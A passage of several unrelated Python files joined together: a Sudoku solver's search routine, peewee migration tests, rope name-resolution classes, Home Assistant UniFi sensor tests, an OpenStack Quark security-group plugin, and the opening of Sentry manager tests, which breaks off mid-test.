The grid dictionary after no futher improvements can be made
"""
# Make a safety copy (we do not want to change the original data)
tmp_vals = values.copy()
# Keeps track if progress could be made
stuck = False
# List of heuristics to apply
heuristics = [ eliminate, only_choice, shared_subgroup, naked_twins ]
while not stuck:
# The number of choices we have before applying our rules
options_before = sum( [ len(v) for v in tmp_vals.values() if len(v) > 1 ] )
# This order is arbitrary
for h in heuristics:
tmp_vals = h(tmp_vals)
# Number of choices afterwards
options_after = sum( [ len(v) for v in tmp_vals.values() if len(v) > 1 ] )
# Did anything change?
stuck = options_before == options_after
return tmp_vals
def search(values):
"""
Applies all heuristics to a sudoku grid and uses recursion if necessary
Args:
values(dict) - Sudoku grid as a dictionary
Keys: The boxes, e.g., 'A1'
Values: All possible values for a box
Returns:
The solved grid, or False if no solution could be found
"""
# Try all we can without guessing
tmp_vals = reduce_puzzle(values)
# If there is any field that has no possible values then this attempt is wrong
for v in values.values():
if len(v) == 0:
return False
# If all boxes contain exactly one number we can return a successful solution
if len( [ k for k in tmp_vals.keys() if len(tmp_vals[k]) == 1 ] ) == len(tmp_vals.keys()):
return tmp_vals
# Now we have to branch: First, find all boxes that contain more than one possible value
candidates = [ k for k in tmp_vals.keys() if len(tmp_vals[k]) > 1 ]
# Then choose the box with the least amount of options
best_box = min(candidates, key = lambda x: len(tmp_vals[x]))
# Now try assigning these values one by one and see if this leads us to a solution (recursively)
for num in tmp_vals[best_box]:
tmp_vals2 = tmp_vals.copy()
tmp_vals2[best_box] = num
result = search(tmp_vals2)
if result:
return result
# Everything has failed...
return False
def solve(grid):
"""
Find the solution to a Sudoku grid.
Args:
grid(string): a string representing a sudoku grid.
Example: '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
Returns:
The dictionary representation of the final sudoku grid. False if no solution exists.
"""
return search(grid_values(grid))
if __name__ == '__main__':
diag_sudoku_grid = '2.............62....1....7...6..8...3...9...7...6..4...4....8....52.............3'
logging.basicConfig(level=logging.INFO)
display(solve(diag_sudoku_grid))
try:
from visualize import visualize_assignments
visualize_assignments(assignments)
except SystemExit:
pass
except:
print('We could not visualize your board due to a pygame issue. Not a problem! It is not a requirement.')
|
|
import os
import unittest
from peewee import CharField, BooleanField, ForeignKeyField, SqliteDatabase
from playhouse.db_url import connect
from playhouse.migrate import SqliteMigrator, MySQLMigrator, PostgresqlMigrator
from playhouse.reflection import Introspector
from . import VersionedModel
from . import migrate
# Setup Database
database_url = os.environ.get('DATABASE', None)
if database_url:
database = connect(database_url)
if database_url.startswith('mysql'):
migrator = MySQLMigrator.from_database(database)
if database_url.startswith('postgres'):
migrator = PostgresqlMigrator.from_database(database)
if database_url.startswith('sqlite'):
migrator = SqliteMigrator.from_database(database)
else:
database = SqliteDatabase(':memory:')
migrator = SqliteMigrator.from_database(database)
introspector = Introspector.from_database(database)
# Basic example class
class BaseClass(VersionedModel):
class Meta:
database = database
class Food(BaseClass):
name = CharField(null=True)
is_tasty = BooleanField()
class Chow(BaseClass):
name = CharField(null=True)
is_tasty = BooleanField()
class Menu(BaseClass):
name = CharField()
class TestMigrations(unittest.TestCase):
def setUp(self):
Food.create_table()
Menu.create_table()
def tearDown(self):
try:
Food.drop_table()
except:
# Food does not exist after rename_table_test
Chow.drop_table()
Menu.drop_table()
# Helper Functions
def assertTableHasColumn(self, table, column, type_=None):
models = introspector.generate_models()
self.assertTrue(
table in models, "table '{}' should be in models".format(table))
self.assertTrue(column in models[
table]._meta.fields, "column '{}' should be in fields".format(column))
if type_ is not None:
self.assertTrue(
isinstance(models[table]._meta.fields[column], type_))
def assertTableDoesNotHaveColumn(self, table, column):
models = introspector.generate_models()
self.assertTrue(
table in models, "table '{}' should be in models".format(table))
self.assertFalse(column in models[
table]._meta.fields, "column '{}' should be in fields".format(column))
def assertTableExists(self, table):
models = introspector.generate_models()
self.assertTrue(
table in models, "table '{}' should be in models".format(table))
def assertTableDoesNotExist(self, table):
models = introspector.generate_models()
self.assertFalse(
table in models, "table '{}' should be in models".format(table))
# Tests
def test_add_column(self):
another_column = CharField(null=True)
migrate(migrator.add_column('food', 'another_column', another_column))
self.assertTableHasColumn('food', 'another_column', CharField)
self.assertTableHasColumn('foodversion', 'another_column', CharField)
def test_add_column_foreign_key(self):
'''
Versioned Models should not have foreign key references
'''
another_column = ForeignKeyField(
Menu, related_name='food', null=True, to_field=Menu.id)
migrate(migrator.add_column('food', 'another_column', another_column))
self.assertTableHasColumn('food', 'another_column', ForeignKeyField)
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
def test_drop_column(self):
migrate(migrator.drop_column('food', 'is_tasty'))
self.assertTableDoesNotHaveColumn('food', 'is_tasty')
self.assertTableDoesNotHaveColumn('foodversion', 'is_tasty')
def test_drop_column_not_in_version(self):
another_column = ForeignKeyField(
Menu, related_name='food', null=True, to_field=Menu.id)
migrate(migrator.add_column('food', 'another_column', another_column))
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
migrate(migrator.drop_column('food', 'another_column'))
self.assertTableDoesNotHaveColumn('food', 'another_column')
def test_rename_column(self):
migrate(migrator.rename_column('food', 'is_tasty', 'was_tasty'))
self.assertTableDoesNotHaveColumn('food', 'is_tasty')
self.assertTableDoesNotHaveColumn('foodversion', 'is_tasty')
self.assertTableHasColumn('food', 'was_tasty')
self.assertTableHasColumn('foodversion', 'was_tasty')
def test_rename_column_not_in_version(self):
another_column = ForeignKeyField(
Menu, related_name='food', null=True, to_field=Menu.id)
migrate(migrator.add_column('food', 'another_column', another_column))
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
migrate(migrator.rename_column('food', 'another_column', 'new_column'))
self.assertTableDoesNotHaveColumn('food', 'another_column')
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
self.assertTableHasColumn('food', 'new_column')
self.assertTableDoesNotHaveColumn('foodversion', 'new_column')
def test_add_not_null(self):
models = introspector.generate_models()
food = models['food']
foodversion = models['foodversion']
self.assertTrue(food.name.null)
self.assertTrue(foodversion.name.null)
migrate(migrator.add_not_null('food', 'name'))
models = introspector.generate_models()
food = models['food']
foodversion = models['foodversion']
self.assertFalse(food.name.null)
self.assertFalse(foodversion.name.null)
def test_add_not_null_not_in_version(self):
another_column = CharField(null=True, default='')
migrate(migrator.add_column('food', 'another_column', another_column))
# drop the field from the nested version
migrator.drop_column('foodversion', 'another_column').run()
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
models = introspector.generate_models()
food = models['food']
self.assertTrue(food.another_column.null)
migrate(migrator.add_not_null('food', 'another_column'))
models = introspector.generate_models()
food = models['food']
self.assertFalse(food.another_column.null)
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
def test_drop_not_null(self):
models = introspector.generate_models()
food = models['food']
foodversion = models['foodversion']
self.assertFalse(food.is_tasty.null)
self.assertFalse(foodversion.is_tasty.null)
migrate(migrator.drop_not_null('food', 'is_tasty'))
models = introspector.generate_models()
food = models['food']
foodversion = models['foodversion']
self.assertTrue(food.is_tasty.null)
self.assertTrue(foodversion.is_tasty.null)
def test_drop_not_null_not_in_version(self):
another_column = CharField(default='')
migrate(migrator.add_column('food', 'another_column', another_column))
# drop the field from the nested version
migrator.drop_column('foodversion', 'another_column').run()
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
models = introspector.generate_models()
food = models['food']
self.assertFalse(food.another_column.null)
migrate(migrator.drop_not_null('food', 'another_column'))
models = introspector.generate_models()
food = models['food']
self.assertTrue(food.another_column.null)
self.assertTableDoesNotHaveColumn('foodversion', 'another_column')
def test_rename_table(self):
self.assertTableExists('food')
self.assertTableExists('foodversion')
# Create some foods
food_kwargs = ({'name': '1', 'is_tasty': False},
{'name': '2', 'is_tasty': False},
{'name': '3', 'is_tasty': False},
{'name': '4', 'is_tasty': False})
for kwargs in food_kwargs:
Food.create(**kwargs)
migrate(migrator.rename_table('food', 'chow'))
self.assertTableExists('chow')
self.assertTableExists('chowversion')
self.assertTableDoesNotExist('food')
self.assertTableDoesNotExist('foodversion')
# check to make sure the versions still exist
for kwargs in food_kwargs:
chow = Chow.get(Chow.name == kwargs['name'])
self.assertEqual(len(chow._versions), 1)
version = chow._versions[0]
for key, value in kwargs.items():
self.assertEqual(value, getattr(chow, key))
self.assertEqual(value, getattr(version, key))
def test_add_index(self):
migrate(migrator.add_index('food', ['name']))
models = introspector.generate_models()
self.assertTrue(models['food'].name.index)
self.assertFalse(models['foodversion'].name.index)
def test_drop_index(self):
# create an index
migrate(migrator.add_index('food', ['name']))
models = introspector.generate_models()
self.assertTrue(models['food'].name.index)
# Drop the index
migrate(migrator.drop_index('food', 'food_name'))
models = introspector.generate_models()
self.assertFalse(models['food'].name.index)
self.assertFalse(models['foodversion'].name.index)
if __name__ == '__main__':
unittest.main()
|
|
import rope.base.pyobjects
from rope.base import exceptions, utils
class PyName(object):
"""References to `PyObject`\s inside python programs"""
def get_object(self):
"""Return the `PyObject` object referenced by this `PyName`"""
def get_definition_location(self):
"""Return a (module, lineno) tuple"""
class DefinedName(PyName):
def __init__(self, pyobject):
self.pyobject = pyobject
def get_object(self):
return self.pyobject
def get_definition_location(self):
return (self.pyobject.get_module(), self.pyobject.get_ast().lineno)
class AssignedName(PyName):
"""Only a placeholder"""
class UnboundName(PyName):
def __init__(self, pyobject=None):
self.pyobject = pyobject
if self.pyobject is None:
self.pyobject = rope.base.pyobjects.get_unknown()
def get_object(self):
return self.pyobject
def get_definition_location(self):
return (None, None)
class AssignmentValue(object):
"""An assigned expression"""
def __init__(self, ast_node, levels=None, evaluation='',
assign_type=False):
"""The `level` is `None` for simple assignments and is
a list of numbers for tuple assignments for example in::
a, (b, c) = x
The levels for for `a` is ``[0]``, for `b` is ``[1, 0]`` and for
`c` is ``[1, 1]``.
"""
self.ast_node = ast_node
if levels is None:
self.levels = []
else:
self.levels = levels
self.evaluation = evaluation
self.assign_type = assign_type
def get_lineno(self):
return self.ast_node.lineno
class EvaluatedName(PyName):
"""A name whose object will be evaluated later"""
def __init__(self, callback, module=None, lineno=None):
self.module = module
self.lineno = lineno
self.callback = callback
self.pyobject = _Inferred(callback, _get_concluded_data(module))
def get_object(self):
return self.pyobject.get()
def get_definition_location(self):
return (self.module, self.lineno)
def invalidate(self):
"""Forget the `PyObject` this `PyName` holds"""
self.pyobject.set(None)
class ParameterName(PyName):
"""Only a placeholder"""
class ImportedModule(PyName):
def __init__(self, importing_module, module_name=None,
level=0, resource=None):
self.importing_module = importing_module
self.module_name = module_name
self.level = level
self.resource = resource
self.pymodule = _get_concluded_data(self.importing_module)
def _current_folder(self):
resource = self.importing_module.get_module().get_resource()
if resource is None:
return None
return resource.parent
def _get_pymodule(self):
if self.pymodule.get() is None:
pycore = self.importing_module.pycore
if self.resource is not None:
self.pymodule.set(pycore.project.get_pymodule(self.resource))
elif self.module_name is not None:
try:
if self.level == 0:
pymodule = pycore.project.get_module(
self.module_name, self._current_folder())
else:
pymodule = pycore.project.get_relative_module(
self.module_name, self._current_folder(),
self.level)
self.pymodule.set(pymodule)
except exceptions.ModuleNotFoundError:
pass
return self.pymodule.get()
def get_object(self):
if self._get_pymodule() is None:
return rope.base.pyobjects.get_unknown()
return self._get_pymodule()
def get_definition_location(self):
pymodule = self._get_pymodule()
if not isinstance(pymodule, rope.base.pyobjects.PyDefinedObject):
return (None, None)
return (pymodule.get_module(), 1)
class ImportedName(PyName):
def __init__(self, imported_module, imported_name):
self.imported_module = imported_module
self.imported_name = imported_name
def _get_imported_pyname(self):
try:
result = self.imported_module.get_object()[self.imported_name]
if result != self:
return result
except exceptions.AttributeNotFoundError:
pass
return UnboundName()
@utils.prevent_recursion(rope.base.pyobjects.get_unknown)
def get_object(self):
return self._get_imported_pyname().get_object()
@utils.prevent_recursion(lambda: (None, None))
def get_definition_location(self):
return self._get_imported_pyname().get_definition_location()
def _get_concluded_data(module):
if module is None:
return rope.base.pyobjects._ConcludedData()
return module._get_concluded_data()
def _circular_inference():
raise rope.base.pyobjects.IsBeingInferredError(
'Circular Object Inference')
class _Inferred(object):
def __init__(self, get_inferred, concluded=None):
self.get_inferred = get_inferred
self.concluded = concluded
if self.concluded is None:
self.temp = None
@utils.prevent_recursion(_circular_inference)
def get(self, *args, **kwds):
if self.concluded is None or self.concluded.get() is None:
self.set(self.get_inferred(*args, **kwds))
if self._get() is None:
self.set(rope.base.pyobjects.get_unknown())
return self._get()
def set(self, pyobject):
if self.concluded is not None:
self.concluded.set(pyobject)
self.temp = pyobject
def _get(self):
if self.concluded is not None:
return self.concluded.get()
return self.temp
|
|
"""UniFi sensor platform tests."""
from datetime import datetime
from unittest.mock import patch
from aiounifi.controller import MESSAGE_CLIENT, MESSAGE_CLIENT_REMOVED
import pytest
from homeassistant.components.device_tracker import DOMAIN as TRACKER_DOMAIN
from homeassistant.components.sensor import DOMAIN as SENSOR_DOMAIN
from homeassistant.components.unifi.const import (
CONF_ALLOW_BANDWIDTH_SENSORS,
CONF_ALLOW_UPTIME_SENSORS,
CONF_TRACK_CLIENTS,
CONF_TRACK_DEVICES,
DOMAIN as UNIFI_DOMAIN,
)
from homeassistant.helpers.dispatcher import async_dispatcher_send
import homeassistant.util.dt as dt_util
from .test_controller import setup_unifi_integration
async def test_no_clients(hass, aioclient_mock):
"""Test the update_clients function when no clients are found."""
await setup_unifi_integration(
hass,
aioclient_mock,
options={
CONF_ALLOW_BANDWIDTH_SENSORS: True,
CONF_ALLOW_UPTIME_SENSORS: True,
},
)
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 0
async def test_bandwidth_sensors(hass, aioclient_mock, mock_unifi_websocket):
"""Verify that bandwidth sensors are working as expected."""
wired_client = {
"hostname": "Wired client",
"is_wired": True,
"mac": "00:00:00:00:00:01",
"oui": "Producer",
"wired-rx_bytes": 1234000000,
"wired-tx_bytes": 5678000000,
}
wireless_client = {
"is_wired": False,
"mac": "00:00:00:00:00:02",
"name": "Wireless client",
"oui": "Producer",
"rx_bytes": 2345000000,
"tx_bytes": 6789000000,
}
options = {
CONF_ALLOW_BANDWIDTH_SENSORS: True,
CONF_ALLOW_UPTIME_SENSORS: False,
CONF_TRACK_CLIENTS: False,
CONF_TRACK_DEVICES: False,
}
config_entry = await setup_unifi_integration(
hass,
aioclient_mock,
options=options,
clients_response=[wired_client, wireless_client],
)
assert len(hass.states.async_all()) == 5
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 4
assert hass.states.get("sensor.wired_client_rx").state == "1234.0"
assert hass.states.get("sensor.wired_client_tx").state == "5678.0"
assert hass.states.get("sensor.wireless_client_rx").state == "2345.0"
assert hass.states.get("sensor.wireless_client_tx").state == "6789.0"
# Verify state update
wireless_client["rx_bytes"] = 3456000000
wireless_client["tx_bytes"] = 7891000000
mock_unifi_websocket(
data={
"meta": {"message": MESSAGE_CLIENT},
"data": [wireless_client],
}
)
await hass.async_block_till_done()
assert hass.states.get("sensor.wireless_client_rx").state == "3456.0"
assert hass.states.get("sensor.wireless_client_tx").state == "7891.0"
# Disable option
options[CONF_ALLOW_BANDWIDTH_SENSORS] = False
hass.config_entries.async_update_entry(config_entry, options=options.copy())
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 1
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 0
assert hass.states.get("sensor.wireless_client_rx") is None
assert hass.states.get("sensor.wireless_client_tx") is None
assert hass.states.get("sensor.wired_client_rx") is None
assert hass.states.get("sensor.wired_client_tx") is None
# Enable option
options[CONF_ALLOW_BANDWIDTH_SENSORS] = True
hass.config_entries.async_update_entry(config_entry, options=options.copy())
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 5
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 4
assert hass.states.get("sensor.wireless_client_rx")
assert hass.states.get("sensor.wireless_client_tx")
assert hass.states.get("sensor.wired_client_rx")
assert hass.states.get("sensor.wired_client_tx")
# Try to add the sensors again, using a signal
clients_connected = {wired_client["mac"], wireless_client["mac"]}
devices_connected = set()
controller = hass.data[UNIFI_DOMAIN][config_entry.entry_id]
async_dispatcher_send(
hass,
controller.signal_update,
clients_connected,
devices_connected,
)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 5
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 4
@pytest.mark.parametrize(
"initial_uptime,event_uptime,new_uptime",
[
# Uptime listed in epoch time should never change
(1609462800, 1609462800, 1612141200),
# Uptime counted in seconds increases with every event
(60, 64, 60),
],
)
async def test_uptime_sensors(
hass,
aioclient_mock,
mock_unifi_websocket,
initial_uptime,
event_uptime,
new_uptime,
):
"""Verify that uptime sensors are working as expected."""
uptime_client = {
"mac": "00:00:00:00:00:01",
"name": "client1",
"oui": "Producer",
"uptime": initial_uptime,
}
options = {
CONF_ALLOW_BANDWIDTH_SENSORS: False,
CONF_ALLOW_UPTIME_SENSORS: True,
CONF_TRACK_CLIENTS: False,
CONF_TRACK_DEVICES: False,
}
now = datetime(2021, 1, 1, 1, 1, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.now", return_value=now):
config_entry = await setup_unifi_integration(
hass,
aioclient_mock,
options=options,
clients_response=[uptime_client],
)
assert len(hass.states.async_all()) == 2
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 1
assert hass.states.get("sensor.client1_uptime").state == "2021-01-01T01:00:00+00:00"
# Verify normal new event doesn't change uptime
# 4 seconds has passed
uptime_client["uptime"] = event_uptime
now = datetime(2021, 1, 1, 1, 1, 4, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.now", return_value=now):
mock_unifi_websocket(
data={
"meta": {"message": MESSAGE_CLIENT},
"data": [uptime_client],
}
)
await hass.async_block_till_done()
assert hass.states.get("sensor.client1_uptime").state == "2021-01-01T01:00:00+00:00"
# Verify new event change uptime
# 1 month has passed
uptime_client["uptime"] = new_uptime
now = datetime(2021, 2, 1, 1, 1, 0, tzinfo=dt_util.UTC)
with patch("homeassistant.util.dt.now", return_value=now):
mock_unifi_websocket(
data={
"meta": {"message": MESSAGE_CLIENT},
"data": [uptime_client],
}
)
await hass.async_block_till_done()
assert hass.states.get("sensor.client1_uptime").state == "2021-02-01T01:00:00+00:00"
# Disable option
options[CONF_ALLOW_UPTIME_SENSORS] = False
hass.config_entries.async_update_entry(config_entry, options=options.copy())
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 1
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 0
assert hass.states.get("sensor.client1_uptime") is None
# Enable option
options[CONF_ALLOW_UPTIME_SENSORS] = True
with patch("homeassistant.util.dt.now", return_value=now):
hass.config_entries.async_update_entry(config_entry, options=options.copy())
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 2
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 1
assert hass.states.get("sensor.client1_uptime")
# Try to add the sensors again, using a signal
clients_connected = {uptime_client["mac"]}
devices_connected = set()
controller = hass.data[UNIFI_DOMAIN][config_entry.entry_id]
async_dispatcher_send(
hass,
controller.signal_update,
clients_connected,
devices_connected,
)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 2
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 1
async def test_remove_sensors(hass, aioclient_mock, mock_unifi_websocket):
"""Verify removing of clients work as expected."""
wired_client = {
"hostname": "Wired client",
"is_wired": True,
"mac": "00:00:00:00:00:01",
"oui": "Producer",
"wired-rx_bytes": 1234000000,
"wired-tx_bytes": 5678000000,
"uptime": 1600094505,
}
wireless_client = {
"is_wired": False,
"mac": "00:00:00:00:00:02",
"name": "Wireless client",
"oui": "Producer",
"rx_bytes": 2345000000,
"tx_bytes": 6789000000,
"uptime": 60,
}
await setup_unifi_integration(
hass,
aioclient_mock,
options={
CONF_ALLOW_BANDWIDTH_SENSORS: True,
CONF_ALLOW_UPTIME_SENSORS: True,
},
clients_response=[wired_client, wireless_client],
)
assert len(hass.states.async_all()) == 9
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 6
assert len(hass.states.async_entity_ids(TRACKER_DOMAIN)) == 2
assert hass.states.get("sensor.wired_client_rx")
assert hass.states.get("sensor.wired_client_tx")
assert hass.states.get("sensor.wired_client_uptime")
assert hass.states.get("sensor.wireless_client_rx")
assert hass.states.get("sensor.wireless_client_tx")
assert hass.states.get("sensor.wireless_client_uptime")
# Remove wired client
mock_unifi_websocket(
data={
"meta": {"message": MESSAGE_CLIENT_REMOVED},
"data": [wired_client],
}
)
await hass.async_block_till_done()
assert len(hass.states.async_all()) == 5
assert len(hass.states.async_entity_ids(SENSOR_DOMAIN)) == 3
assert len(hass.states.async_entity_ids(TRACKER_DOMAIN)) == 1
assert hass.states.get("sensor.wired_client_rx") is None
assert hass.states.get("sensor.wired_client_tx") is None
assert hass.states.get("sensor.wired_client_uptime") is None
assert hass.states.get("sensor.wireless_client_rx")
assert hass.states.get("sensor.wireless_client_tx")
assert hass.states.get("sensor.wireless_client_uptime")
|
|
# Copyright 2013 Rackspace Hosting Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.extensions import securitygroup as sg_ext
from neutron import quota
from neutron_lib import exceptions as n_exc
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import uuidutils
from quark.db import api as db_api
from quark.environment import Capabilities
from quark import exceptions as q_exc
from quark import plugin_views as v
from quark import protocols
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
DEFAULT_SG_UUID = "00000000-0000-0000-0000-000000000000"
GROUP_NAME_MAX_LENGTH = 255
GROUP_DESCRIPTION_MAX_LENGTH = 255
def _validate_security_group_rule(context, rule):
# TODO(mdietz): As per RM8615, Remote groups are not currently supported
if rule.get("remote_group_id"):
raise n_exc.InvalidInput(
error_message="Remote groups are not currently supported")
direction = rule.get("direction")
if direction == Capabilities.EGRESS:
if Capabilities.EGRESS not in CONF.QUARK.environment_capabilities:
raise q_exc.EgressSecurityGroupRulesNotEnabled()
protocol = rule.pop('protocol')
port_range_min = rule['port_range_min']
port_range_max = rule['port_range_max']
ethertype = protocols.translate_ethertype(rule["ethertype"])
if protocol:
protocol = protocols.translate_protocol(protocol, rule["ethertype"])
protocols.validate_protocol_with_port_ranges(ethertype,
protocol,
port_range_min,
port_range_max)
rule['protocol'] = protocol
else:
if port_range_min is not None or port_range_max is not None:
raise sg_ext.SecurityGroupProtocolRequiredWithPorts()
rule["ethertype"] = ethertype
protocols.validate_remote_ip_prefix(ethertype,
rule.get("remote_ip_prefix"))
return rule
def _validate_security_group(security_group):
if "name" in security_group:
if len(security_group["name"]) > GROUP_NAME_MAX_LENGTH:
raise n_exc.InvalidInput(
error_message="Group name must be 255 characters or less")
if security_group["name"] == "default":
raise sg_ext.SecurityGroupDefaultAlreadyExists()
if ("description" in security_group and
len(security_group["description"]) > GROUP_DESCRIPTION_MAX_LENGTH):
raise n_exc.InvalidInput(
error_message="Group description must be 255 characters or less")
def create_security_group(context, security_group):
LOG.info("create_security_group for tenant %s" %
(context.tenant_id))
group = security_group["security_group"]
_validate_security_group(group)
group_name = group.get('name', '')
group_id = uuidutils.generate_uuid()
with context.session.begin():
group["id"] = group_id
group["name"] = group_name
group["tenant_id"] = context.tenant_id
dbgroup = db_api.security_group_create(context, **group)
return v._make_security_group_dict(dbgroup)
def create_security_group_rule(context, security_group_rule):
LOG.info("create_security_group for tenant %s" %
(context.tenant_id))
with context.session.begin():
rule = _validate_security_group_rule(
context, security_group_rule["security_group_rule"])
rule["id"] = uuidutils.generate_uuid()
group_id = rule["security_group_id"]
group = db_api.security_group_find(context, id=group_id,
scope=db_api.ONE)
if not group:
raise sg_ext.SecurityGroupNotFound(id=group_id)
quota.QUOTAS.limit_check(
context, context.tenant_id,
security_rules_per_group=len(group.get("rules", [])) + 1)
new_rule = db_api.security_group_rule_create(context, **rule)
return v._make_security_group_rule_dict(new_rule)
def delete_security_group(context, id):
LOG.info("delete_security_group %s for tenant %s" %
(id, context.tenant_id))
with context.session.begin():
group = db_api.security_group_find(context, id=id, scope=db_api.ONE)
# TODO(anyone): name and ports are lazy-loaded. Could be good op later
if not group:
raise sg_ext.SecurityGroupNotFound(id=id)
if id == DEFAULT_SG_UUID or group.name == "default":
raise sg_ext.SecurityGroupCannotRemoveDefault()
if group.ports:
raise sg_ext.SecurityGroupInUse(id=id)
db_api.security_group_delete(context, group)
def delete_security_group_rule(context, id):
LOG.info("delete_security_group %s for tenant %s" %
(id, context.tenant_id))
with context.session.begin():
rule = db_api.security_group_rule_find(context, id=id,
scope=db_api.ONE)
if not rule:
raise sg_ext.SecurityGroupRuleNotFound(id=id)
group = db_api.security_group_find(context, id=rule["group_id"],
scope=db_api.ONE)
if not group:
raise sg_ext.SecurityGroupNotFound(id=id)
rule["id"] = id
db_api.security_group_rule_delete(context, rule)
def get_security_group(context, id, fields=None):
LOG.info("get_security_group %s for tenant %s" %
(id, context.tenant_id))
group = db_api.security_group_find(context, id=id, scope=db_api.ONE)
if not group:
raise sg_ext.SecurityGroupNotFound(id=id)
return v._make_security_group_dict(group, fields)
def get_security_group_rule(context, id, fields=None):
LOG.info("get_security_group_rule %s for tenant %s" %
(id, context.tenant_id))
rule = db_api.security_group_rule_find(context, id=id,
scope=db_api.ONE)
if not rule:
raise sg_ext.SecurityGroupRuleNotFound(id=id)
return v._make_security_group_rule_dict(rule, fields)
def get_security_groups(context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
LOG.info("get_security_groups for tenant %s" %
(context.tenant_id))
groups = db_api.security_group_find(context, **filters)
return [v._make_security_group_dict(group) for group in groups]
def get_security_group_rules(context, filters=None, fields=None,
sorts=None, limit=None, marker=None,
page_reverse=False):
LOG.info("get_security_group_rules for tenant %s" %
(context.tenant_id))
rules = db_api.security_group_rule_find(context, **filters)
return [v._make_security_group_rule_dict(rule) for rule in rules]
def update_security_group(context, id, security_group):
if id == DEFAULT_SG_UUID:
raise sg_ext.SecurityGroupCannotUpdateDefault()
new_group = security_group["security_group"]
_validate_security_group(new_group)
with context.session.begin():
group = db_api.security_group_find(context, id=id, scope=db_api.ONE)
db_group = db_api.security_group_update(context, group, **new_group)
return v._make_security_group_dict(db_group)
|
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import datetime
import mock
from django.utils import timezone
from sentry.conf import settings
from sentry.interfaces import Interface
from sentry.models import Event, Group, Project, MessageCountByMinute, ProjectCountByMinute, \
SearchDocument
from sentry.utils.db import has_trending
from tests.base import TestCase
class DummyInterface(Interface):
def __init__(self, baz):
self.baz = baz
class SentryManagerTest(TestCase):
@mock.patch('sentry.models.SearchDocument.objects.index')
def test_broken_search_index(self, index):
index.side_effect = Exception()
event = Group.objects.from_kwargs(1, message='foo')
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
@mock.patch('sentry.signals.regression_signal.send')
def test_broken_regression_signal(self, send):
send.side_effect = Exception()
event = Group.objects.from_kwargs(1, message='foo')
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
def test_invalid_project(self):
self.assertRaises(Project.DoesNotExist, Group.objects.from_kwargs, 2, message='foo')
def test_valid_only_message(self):
event = Group.objects.from_kwargs(1, message='foo')
self.assertEquals(event.group.last_seen, event.datetime)
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
def test_valid_timestamp_without_tz(self):
# TODO: this doesnt error, but it will throw a warning. What should we do?
with self.Settings(USE_TZ=True):
date = datetime.datetime.utcnow()
event = Group.objects.from_kwargs(1, message='foo', timestamp=date)
self.assertEquals(event.message, 'foo')
self.assertEquals(event.project_id, 1)
self.assertEquals(event.datetime, date.replace(tzinfo=timezone.utc))
def test_url_filter(self):
event = Group.objects.from_kwargs(1, message='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 0)
event = Group.objects.from_kwargs(1, message='foo', **{
'sentry.interfaces.Http': {
'url': 'http://example.com',
}
})
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
res = group.messagefiltervalue_set.filter(key='url').get()
self.assertEquals(res.value, 'http://example.com')
self.assertEquals(res.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo', **{
'sentry.interfaces.Http': {
'url': 'http://example.com',
}
})
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 1)
res = group.messagefiltervalue_set.filter(key='url').get()
self.assertEquals(res.value, 'http://example.com')
self.assertEquals(res.times_seen, 2)
event = Group.objects.from_kwargs(1, message='foo', **{
'sentry.interfaces.Http': {
'url': 'http://example.com/2',
}
})
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='url').count(), 2)
results = list(group.messagefiltervalue_set.filter(key='url').order_by('id'))
res = results[0]
self.assertEquals(res.value, 'http://example.com')
self.assertEquals(res.times_seen, 2)
res = results[1]
self.assertEquals(res.value, 'http://example.com/2')
self.assertEquals(res.times_seen, 1)
def test_site_filter(self):
event = Group.objects.from_kwargs(1, message='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 0)
event = Group.objects.from_kwargs(1, message='foo', site='foo')
group = event.group
self.assertEquals(group.messagefiltervalue_set.filter(key='site').count(), 1)
res = group.messagefiltervalue_set.filter(key='site').get()
self.assertEquals(res.value, 'foo')
self.assertEquals(res.times_seen, 1)
event = Group.objects.from_kwargs(1, message='foo', site='foo')
group = event.group
